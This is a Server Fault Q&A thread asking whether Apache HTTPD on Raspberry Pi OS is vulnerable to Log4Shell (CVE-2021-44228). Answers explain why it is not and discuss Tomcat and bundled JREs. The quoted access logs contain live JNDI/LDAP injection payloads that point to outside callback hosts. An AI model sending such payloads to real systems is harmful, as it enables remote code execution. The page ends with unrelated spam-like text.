Join Log in
Score:44
gilex avatar Server

Does Apache Webserver use log4j (CVE-2021-44228)?

cn flag
gilex

Does the apache webserver (apache2) use log4j?

I have Apache2 2.4.38 (debian) installed on Raspberry Pi OS (64bit) and found some strange records in my log regarding CVE-2021-44228 from kryptoslogic-cve-2021-44228.com (honeypot/scanner), dataastatistics.com (offline & malicious?) and a8fvkc.dnslog.cn (I dont know what this is)

What should I do now?

  • nothing because apache2 is not affected by CVE-2021-44228
  • format everything and wait for a few days before I install a patched version
  • "check" if there are any new .class files and if there are not continue operation (and use manual patches like log4j2.formatMsgNoLookups = TRUE
  • something else

Logs:

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
139.59.99.80 - - [11/Dec/2021:20:13:11 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 8456 "-" "Kryptos Logic Telltale"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
137.184.106.119 - - [10/Dec/2021:20:38:18 +0100] "GET / HTTP/1.1" 301 568 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] "GET / HTTP/1.1" 200 6576 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:21 +0100] "GET /favicon.ico HTTP/1.1" 200 7103 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
36324
0 + 0
Tilman Schmidt avatar
bd flag
Tilman Schmidt
Please share those "strange" log records you mention. It's difficult to evaluate them without seeing them.
0
Reply
user3067860 avatar
ng flag
user3067860
Note that just because _some_ software is not impacted doesn't mean you're not running other software which could be impacted.
1
Reply
Score:82
avatar Server
mx flag
mschuett

The Apache HTTP Server is not written in Java, it does not use the log4j library, so it is not affected by CVE-2021-44228.

Your log files are from the access log, they show people scanning for the log4j vulnerability.

0 + 0
mckenzm avatar
in flag
mckenzm
Good to see Tomcat covered in another answer.
2
Reply
mx flag
mschuett
Not directly related, but if you find this QA to check your Apache HTTP Server setup, then please make sure to upgrade to version 2.4.52. Previous versions have their own [vulnerabilities](https://httpd.apache.org/security/vulnerabilities_24.html) such as [CVE-2021-44224](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44224).
0
Reply
Score:8
fraxinus avatar Server
ng flag
fraxinus

Apache itself is not written in Java and does not directly link the infamous Log4j library. It is particularilly safe from this vulnerability.

What else can go wrong, then?

  1. Not everything with Apache in its name and HTTP functions is exactly the Apache HTTPD server. Apache Tomcat, for example, is completely different HTTP web server. It is written in Java and can pretty much be configured to use Log4J. I am not really sure if it is at all possible to log otherwise in Tomcat.

Someone with less experience and knowledge is perfectly capable of mistaking those two. And, to my knowledge, Tomcat has in general better security track record than the "classical" Apache HTTPD.

(As per Bob's comment, the default logging facility in Tomcat is not Log4J.)

  1. Apache HTTPD is very much extensible. It can be configured to call other things in the background by variety of interfaces (e.g. in order to fetch dynamic web pages that are generated programatically). Some of these "things in the background" may be java-based and linked to the Log4J library.

Your mileage may vary, especially if you don't know in detail your software stack.

In order to be sure, you should first check if you have any Java machine installed. In your package manager, it's packages will be called JRE-something, JVM-something or maybe JAVA-something.

You may as well try:

java -version

in your shell.

If you don't have any of these and you didn't install JAVA outside of your package manager, you are safe.

Not safe in general, but at least safe against CVE-2021-44228.

0 + 0
kz flag
Bob
*> I am not really sure if it is at all possible to log otherwise in Tomcat.* Tomcat, by default, does not use log4j unless configured otherwise. [By default it uses `java.util.logging` via a fork of Apache Commons Logging.](https://tomcat.apache.org/tomcat-9.0-doc/logging.html) In 8.0 [instructions](https://tomcat.apache.org/tomcat-8.0-doc/logging.html#Using_Log4j) were provided for switching to log4j but those were [removed](https://tomcat.apache.org/tomcat-8.5-doc/logging.html) in 8.5.
2
Reply
kz flag
Bob
*> If you don't have any of these and you didn't install JAVA outside of your package manager, you are safe.* The nature of the JRE and how it is redistributed means many applications can and will embed it rather than use an OS package manager (if one even exists... see Windows and macOS). It is certainly **not** safe to assume you do not have any vulnerable programs simply because you didn't install Java yourself, package manager or otherwise. Those embedded versions typically are not part of your `PATH` either, so testing `java` in your shell is not a guarantee of safety.
3
Reply
fraxinus avatar
ng flag
fraxinus
The Q explicitly asks about Rapsbian. In Linux, applications (esp. server ones) generally don't bring their JVM, they just list it as dependency and the package manager brings whatever is needed.
0
Reply
ec flag
hobbs
@fraxinus although there are a lot of people trying to ruin that with things like Snaps.
0
Reply
il flag
OrangeDog
@fraxinus you can't make that generalisation. Elastic products bundle their own JRE, for example. With modern Java there isn't even a provided standalone JRE - developers are supposed to compile their own for their application's needs.
1
Reply
kz flag
Bob
@fraxinus The problem when talking security is that "generally" isn't good enough. There are enough products, especially large enterprise products (including on Linux), that will bundle their own JRE that it's a legitimate concern. Especially with such a severe vulnerability. Also, while this question body may refer to Raspbian specifically, the question title may prompt others to look at the question - and IMO when giving security advice it really is best to cover all bases.
0
Reply
fraxinus avatar
ng flag
fraxinus
You simply CANNOT cover all bases in security answer to a simple question. Knowing your software stack is essential and if you don't, you deserve what you get. Without this, you resort to recipes with "generally" in them.
0
Reply
mckenzm avatar
in flag
mckenzm
@fraxinus they most certainly do. Primo cases include Minecraft and Arduino. They do bring their own. Not only that but a lot of container leverage revolves around pre-version 8, and even pre-version 6. The containers are to jail that %&^!.
0
Reply
ธงชาติไทย
Elon Musk
I sit in a Tesla and translated this thread with Ai:

mangohost

Post an answer

Most people don’t grasp that asking a lot of questions unlocks learning and improves interpersonal bonding. In Alison’s studies, for example, though people could accurately recall how many questions had been asked in their conversations, they didn’t intuit the link between questions and liking. Across four studies, in which participants were engaged in conversations themselves or read transcripts of others’ conversations, people tended not to realize that question asking would influence—or had influenced—the level of amity between the conversationalists.